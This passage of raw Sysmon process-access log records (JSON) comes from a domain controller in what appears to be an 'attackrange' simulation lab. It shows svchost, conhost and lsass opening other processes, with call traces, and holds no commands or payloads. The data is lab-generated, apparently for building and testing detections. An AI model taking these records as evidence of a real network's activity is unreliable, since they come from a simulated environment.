07:53:47.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2501,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2502,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2503,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2504,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2505,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2506,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2507,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.829\r\nSourceProcessGUID: {41C8662E-1F8B-5F25-0000-0010905D0400}\r\nSourceProcessId: 4120\r\nSourceThreadId: 4140\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-1F8B-5F25-0000-001027660400}\r\nTargetProcessId: 4212\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.829","SourceProcessGUID":"{41C8662E-1F8B-5F25-0000-0010905D0400}","SourceProcessId":"4120","SourceThreadId":"4140","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-1F8B-5F25-0000-001027660400}","TargetProcessId":"4212","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:53:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:53:47","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2508,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:53:47.845\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:53:47.845","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 